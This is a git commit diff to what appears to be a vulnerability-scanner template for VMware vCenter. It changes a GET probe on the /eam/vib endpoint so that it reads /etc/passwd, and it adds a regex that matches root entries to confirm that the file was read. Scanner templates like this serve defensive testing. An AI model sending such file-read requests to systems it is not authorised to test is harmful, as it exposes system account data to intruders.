patch-1
Dhiyaneshwaran 2023-03-03 00:33:52 +05:30 committed by GitHub
parent 7d11a0e2af
commit 367a2434b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -14,10 +14,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/eam/vib?id=/etc/issue"
- "{{BaseURL}}/eam/vib?id=/etc/passwd"
matchers:
- type: word
words:
- "vCenter Server"
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/08/01